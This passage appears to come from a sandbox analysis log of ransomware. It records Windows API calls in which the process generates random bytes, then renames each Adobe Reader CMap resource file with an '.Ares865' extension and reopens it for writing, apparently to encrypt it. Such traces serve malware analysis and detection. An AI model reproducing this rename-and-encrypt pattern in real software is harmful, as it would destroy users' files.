out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.513] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.513] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.539] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.540] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.540] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.544] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-GBpc-EUC" | out: lpString1="UCS2-GBpc-EUC") returned="UCS2-GBpc-EUC" [0162.544] lstrlenW (lpString="UCS2-GBpc-EUC") returned 13 [0162.544] lstrlenW (lpString="Ares865") returned 7 [0162.544] lstrcmpiW (lpString1="Bpc-EUC", lpString2="Ares865") returned 1 [0162.544] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC.Ares865") returned 76 [0162.544] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbpc-euc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbpc-euc.ares865"), dwFlags=0x1) returned 1 [0162.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-GBpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-gbpc-euc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.547] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=197163) returned 1 [0162.548] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.548] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.548] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.568] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-KSCms-UHC" | out: lpString1="UCS2-KSCms-UHC") returned="UCS2-KSCms-UHC" [0162.568] lstrlenW (lpString="UCS2-KSCms-UHC") returned 14 [0162.568] lstrlenW (lpString="Ares865") returned 7 [0162.568] lstrcmpiW (lpString1="Cms-UHC", lpString2="Ares865") returned 1 [0162.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC.Ares865") returned 77 [0162.568] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscms-uhc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscms-uhc.ares865"), dwFlags=0x1) returned 1 [0162.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCms-UHC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscms-uhc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196449) returned 1 [0162.570] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.571] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.571] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.586] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.590] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UCS2-KSCpc-EUC" | out: lpString1="UCS2-KSCpc-EUC") returned="UCS2-KSCpc-EUC" [0162.590] lstrlenW (lpString="UCS2-KSCpc-EUC") returned 14 [0162.590] lstrlenW (lpString="Ares865") returned 7 [0162.590] lstrcmpiW (lpString1="Cpc-EUC", lpString2="Ares865") returned 1 [0162.590] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC.Ares865") returned 77 [0162.590] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscpc-euc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscpc-euc.ares865"), dwFlags=0x1) returned 1 [0162.592] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-KSCpc-EUC.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-kscpc-euc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153399) returned 1 [0162.593] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.593] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.593] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.606] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.606] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.606] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.609] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniCNS-UCS2-H" | out: lpString1="UniCNS-UCS2-H") returned="UniCNS-UCS2-H" [0162.609] lstrlenW (lpString="UniCNS-UCS2-H") returned 13 [0162.609] lstrlenW (lpString="Ares865") returned 7 [0162.609] lstrcmpiW (lpString1="-UCS2-H", lpString2="Ares865") returned 1 [0162.609] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H.Ares865") returned 76 [0162.609] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-h.ares865"), dwFlags=0x1) returned 1 [0162.611] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.611] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=343410) returned 1 [0162.612] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.612] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.612] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.633] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.634] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.634] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.639] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniCNS-UCS2-V" | out: lpString1="UniCNS-UCS2-V") returned="UniCNS-UCS2-V" [0162.639] lstrlenW (lpString="UniCNS-UCS2-V") returned 13 [0162.639] lstrlenW (lpString="Ares865") returned 7 [0162.639] lstrcmpiW (lpString1="-UCS2-V", lpString2="Ares865") returned 1 [0162.639] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V.Ares865") returned 76 [0162.639] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-v.ares865"), dwFlags=0x1) returned 1 [0162.641] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.642] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3130) returned 1 [0162.642] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.643] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.643] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.645] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.645] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.646] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniCNS-UTF16-H" | out: lpString1="UniCNS-UTF16-H") returned="UniCNS-UTF16-H" [0162.646] lstrlenW (lpString="UniCNS-UTF16-H") returned 14 [0162.646] lstrlenW (lpString="Ares865") returned 7 [0162.646] lstrcmpiW (lpString1="UTF16-H", lpString2="Ares865") returned 1 [0162.646] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H.Ares865") returned 77 [0162.646] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-h.ares865"), dwFlags=0x1) returned 1 [0162.648] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.648] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=271849) returned 1 [0162.648] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.649] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.649] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.668] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.669] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.669] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.673] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniCNS-UTF16-V" | out: lpString1="UniCNS-UTF16-V") returned="UniCNS-UTF16-V" [0162.673] lstrlenW (lpString="UniCNS-UTF16-V") returned 14 [0162.673] lstrlenW (lpString="Ares865") returned 7 [0162.673] lstrcmpiW (lpString1="UTF16-V", lpString2="Ares865") returned 1 [0162.673] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V.Ares865") returned 77 [0162.673] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-v.ares865"), dwFlags=0x1) returned 1 [0162.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.675] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3123) returned 1 [0162.676] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.676] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.676] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.679] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.680] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.680] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.681] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniGB-UCS2-H" | out: lpString1="UniGB-UCS2-H") returned="UniGB-UCS2-H" [0162.681] lstrlenW (lpString="UniGB-UCS2-H") returned 12 [0162.681] lstrlenW (lpString="Ares865") returned 7 [0162.681] lstrcmpiW (lpString1="-UCS2-H", lpString2="Ares865") returned 1 [0162.681] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H.Ares865") returned 75 [0162.681] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-h.ares865"), dwFlags=0x1) returned 1 [0162.684] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.684] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=288773) returned 1 [0162.684] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.704] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.705] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.705] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.709] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniGB-UCS2-V" | out: lpString1="UniGB-UCS2-V") returned="UniGB-UCS2-V" [0162.709] lstrlenW (lpString="UniGB-UCS2-V") returned 12 [0162.709] lstrlenW (lpString="Ares865") returned 7 [0162.709] lstrcmpiW (lpString1="-UCS2-V", lpString2="Ares865") returned 1 [0162.709] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V.Ares865") returned 75 [0162.709] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-v.ares865"), dwFlags=0x1) returned 1 [0162.712] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UCS2-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-ucs2-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3337) returned 1 [0162.712] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.713] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.713] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.716] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.716] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.716] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.717] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniGB-UTF16-H" | out: lpString1="UniGB-UTF16-H") returned="UniGB-UTF16-H" [0162.717] lstrlenW (lpString="UniGB-UTF16-H") returned 13 [0162.717] lstrlenW (lpString="Ares865") returned 7 [0162.717] lstrcmpiW (lpString1="UTF16-H", lpString2="Ares865") returned 1 [0162.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H.Ares865") returned 76 [0162.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-h.ares865"), dwFlags=0x1) returned 1 [0162.719] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=214334) returned 1 [0162.719] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.720] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.720] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.755] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.756] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.756] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.759] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniGB-UTF16-V" | out: lpString1="UniGB-UTF16-V") returned="UniGB-UTF16-V" [0162.759] lstrlenW (lpString="UniGB-UTF16-V") returned 13 [0162.759] lstrlenW (lpString="Ares865") returned 7 [0162.759] lstrcmpiW (lpString1="UTF16-V", lpString2="Ares865") returned 1 [0162.759] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V.Ares865") returned 76 [0162.759] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-v.ares865"), dwFlags=0x1) returned 1 [0162.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniGB-UTF16-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unigb-utf16-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3234) returned 1 [0162.762] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.763] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.763] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.765] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.766] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.766] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.766] lstrcpyW (in: lpString1=0x2cce46e, lpString2="UniJIS-UCS2-H" | out: lpString1="UniJIS-UCS2-H") returned="UniJIS-UCS2-H" [0162.766] lstrlenW (lpString="UniJIS-UCS2-H") returned 13 [0162.767] lstrlenW (lpString="Ares865") returned 7 [0162.767] lstrcmpiW (lpString1="-UCS2-H", lpString2="Ares865") returned 1 [0162.767] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H.Ares865") returned 76 [0162.767] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 